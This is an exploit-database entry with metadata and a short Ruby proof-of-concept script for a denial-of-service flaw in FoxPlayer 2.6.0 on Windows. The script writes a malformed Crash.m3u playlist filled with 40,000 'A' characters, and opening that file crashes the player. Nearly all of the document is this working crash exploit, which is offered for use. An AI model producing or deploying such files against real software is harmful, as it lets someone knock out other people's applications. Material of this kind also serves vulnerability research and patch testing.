FoxPlayer 2.6.0 - Denial of Service

Author: Ahmed Elhady Mohamed
type: dos
platform: windows
port: 
date_added: 2012-04-01  
date_updated: 2012-04-05  
verified: 1  
codes: OSVDB-80806  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-05-at-44345-pm.png  
application_url:   

raw file: 18691.rb  
Denial of Service in FoxPlayer version 2.6.0
===================================================================================
# Exploit Title:Denial of Service in FoxPlayer version 2.6.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: version 2.6.0
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC#######################################
#Foxplayer 2.6.0 suffers form a denial of service vulnerability ,when opening a   #
#malicious .m3u file.                                                             #
###################################################################################

#!/usr/bin/ruby
File.open "Crash.m3u" , "w" do |file|
	junk = "A" * 40000
	file.puts junk
end